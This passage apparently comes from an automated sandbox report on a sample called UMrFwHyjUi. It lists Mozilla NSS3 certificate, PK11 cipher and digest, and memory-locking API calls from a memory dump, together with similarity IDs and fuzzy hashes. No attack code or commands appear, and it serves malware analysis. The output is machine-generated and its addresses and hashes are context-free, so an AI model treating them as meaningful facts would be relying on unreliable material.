                                                                                                                                                                                                                            • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CB63CF6
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB63D03
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB63D15
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1376842649-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB811C0: PR_NewLock.NSS3 ref: 6CB81216
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB69E17
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB69E25
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB69E4E
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB69EA2
                                                                                                                                                                                                                              • Part of subcall function 6CB79500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CB79546
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB69EB6
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB69ED9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CB69F18
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3381623595-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(D958E852,6CB81397,5B5F5EC0,?,?,6CB7B1EE,2404110F,?,?), ref: 6CB7AB3C
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(D958E836,?,6CB7B1EE,2404110F,?,?), ref: 6CB7AB49
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(5D5E6CD7), ref: 6CB7AB5C
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(5D5E6CCB), ref: 6CB7AB63
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CB7AB6F
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CB7AB76
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB7DCFA
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CB7DD0E
                                                                                                                                                                                                                            • PK11_IsFriendly.NSS3(?), ref: 6CB7DD73
                                                                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CB7DD8B
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB7DE81
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB7DEA6
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB7DF08
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __allrem
                                                                                                                                                                                                                            • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_NewCertList.NSS3 ref: 6CB8BD1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB62F0A
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB62F1D
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB6B41E,00000000,00000000,?,00000000,?,6CB6B41E,00000000,00000000,00000001,?), ref: 6CBA57E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBA5843
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB8BD8C
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CB8BD9B
                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CB8BDA9
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8BE3A
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB63EC2
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB63ED6
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB63EEE
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB63F02
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_FreeArenaPool.NSS3 ref: 6CB63F14
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB63F27
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8BE52
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: TlsGetValue.KERNEL32 ref: 6CB62E4E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableLookup.NSS3(?), ref: 6CB62E71
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableRemove.NSS3(?), ref: 6CB62E84
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PR_Unlock.NSS3 ref: 6CB62EA9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB8BE61
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC35
                                                                                                                                                                                                                              • Part of subcall function 6CB8CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB8CF16
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC55
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E,?,?), ref: 6CBAAC70
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E33C
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E350
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PR_Unlock.NSS3(?), ref: 6CB8E5BC
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CB8E5CA
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E5F2
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E606
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PORT_Alloc_Util.NSS3(?), ref: 6CB8E613
                                                                                                                                                                                                                            • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CBAAC92
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E), ref: 6CBAACD7
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CBAAD10
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CBAAD2B
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: TlsGetValue.KERNEL32(00000000,?,6CBAA904,?), ref: 6CB8F38B
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: EnterCriticalSection.KERNEL32(?,?,?,6CBAA904,?), ref: 6CB8F3A0
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: PR_Unlock.NSS3(?,?,?,?,6CBAA904,?), ref: 6CB8F3D3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2926855110-0
                                                                                                                                                                                                                            • Opcode ID: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
                                                                                                                                                                                                                            • Instruction ID: e9ad1124726a4a8894e53eb07503ca0b9f27e19e3ebdb4e05e5a1a6ac27c5960
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C3127B1E046556FEB008FA9DC409AF7776EF84728B188128E8559B740FB31DC068FB2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB88C7C
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB88CB0
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB88CD1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB88CE5
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB88D2E
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CB88D62
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB88D93
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3131193014-0
                                                                                                                                                                                                                            • Opcode ID: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
                                                                                                                                                                                                                            • Instruction ID: 0c66355ba32d26d3519cf33d1ba9033f2d9b49637bfce6e1aaecabeb2b2304d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3314A71E02255AFD7009F68DC447EA77B4FF15318F14013AEA1567B50E772A924CBD2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CB8DDEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC08B4
                                                                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CB8DE70
                                                                                                                                                                                                                            • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CB8DE83
                                                                                                                                                                                                                            • HASH_ResultLenByOidTag.NSS3(?), ref: 6CB8DE95
                                                                                                                                                                                                                            • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CB8DEAE
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB8DEBB
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB8DECC
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1091488953-0
                                                                                                                                                                                                                            • Opcode ID: 23143e3a181dcaa760705a678519d11307cbae6dafb773f723e387ead8d15b93
                                                                                                                                                                                                                            • Instruction ID: 026b76d21a9d3db3e69bb412751bf352b67cd46e0ec8d740a81ff12b9c565cd0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23143e3a181dcaa760705a678519d11307cbae6dafb773f723e387ead8d15b93
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B31C1B2A012556BEF00AA78BC41BBF76A8EF54609F050126EC09A7701FB31D91886F2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC30
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC4E
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC5A
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBBDC7E
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBBDCAD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2632744278-0
                                                                                                                                                                                                                            • Opcode ID: 70ec00f1aa6343f62a118e5f5ef50d374da2e6ad5892f0bd01e6dd0d09bda471
                                                                                                                                                                                                                            • Instruction ID: 5fc5c3b4026e9f9c646ee0e72bb3901ec5dfab9d3a5eaf984455ea792adb22b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70ec00f1aa6343f62a118e5f5ef50d374da2e6ad5892f0bd01e6dd0d09bda471
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D73184B56002809FD750CF2DE880B66B7F8EF15358F148429E94CDBB05EB75E944CBA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB78C1B
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6CB78C34
                                                                                                                                                                                                                            • PL_ArenaAllocate.NSS3 ref: 6CB78C65
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB78C9C
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB78CB6
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                            • String ID: KRAM
                                                                                                                                                                                                                            • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6CC72CA0
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6CC72CBE
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6CC72CD1
                                                                                                                                                                                                                            • strdup.MOZGLUE(?), ref: 6CC72CE1
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC72D27
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Loaded library %s (static lib), xrefs: 6CC72D22
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                            • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                            • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB6BDCA
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB6BDDB
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB6BDEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CB6BE03
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB6BE22
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB6BE30
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB6BE3B
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1821307800-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBF1C74
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CBF1C92
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBF1C99
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CBF1CCB
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBF1CD2
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3805613680-0
                                                                                                                                                                                                                            APIs
